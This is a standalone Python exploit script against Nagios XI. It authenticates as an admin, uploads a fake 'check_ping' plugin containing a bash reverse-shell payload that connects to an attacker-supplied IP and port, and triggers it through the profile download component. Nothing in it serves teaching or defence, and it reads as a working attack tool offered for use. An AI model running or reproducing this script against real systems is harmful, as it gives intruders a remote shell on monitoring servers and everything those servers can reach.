#!/usr/bin/env python3 import requests import sys import urllib3 from bs4 import BeautifulSoup # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(host, ssl, username, password, reverse_ip, reverse_port): proto = "https" if ssl else "http" base_url = f"{proto}://{host}" session = requests.Session() session.verify = False # Get login page and extract NSP login_url = f"{base_url}/nagiosxi/login.php" resp = session.get(login_url) soup = BeautifulSoup(resp.text, 'html.parser') nsp = soup.find('input', {'name': 'nsp'})['value'] # Login login_data = { 'username': username, 'password': password, 'pageopt': 'login', 'nsp': nsp } resp = session.post(login_url, data=login_data) if resp.status_code != 200: print("Login failed") return # Get plugin management page and extract NSP plugin_url = f"{base_url}/nagiosxi/admin/monitoringplugins.php" resp = session.get(plugin_url) soup = BeautifulSoup(resp.text, 'html.parser') nsp = soup.find('input', {'name': 'nsp'})['value'] # Upload payload payload = f"bash -i >& /dev/tcp/{reverse_ip}/{reverse_port} 0>&1" files = { 'uploadedfile': ('check_ping', payload, 'text/plain') } data = { 'upload': '1', 'nsp': nsp, 'MAX_FILE_SIZE': '20000000' } resp = session.post(plugin_url, files=files, data=data) # Trigger the payload profile_url = f"{base_url}/nagiosxi/includes/components/profile/profile.php?cmd=download" session.get(profile_url) print("Exploit completed. Check your listener.") if __name__ == "__main__": if len(sys.argv) != 7: print("Usage: python3 exploit.py ") print("Example: python3 exploit.py 192.168.175.136 false nagiosadmin admin 192.168.45.213 4444") sys.exit(1) host = sys.argv[1] ssl = sys.argv[2].lower() == 'true' username = sys.argv[3] password = sys.argv[4] reverse_ip = sys.argv[5] reverse_port = sys.argv[6] exploit(host, ssl, username, password, reverse_ip, reverse_port)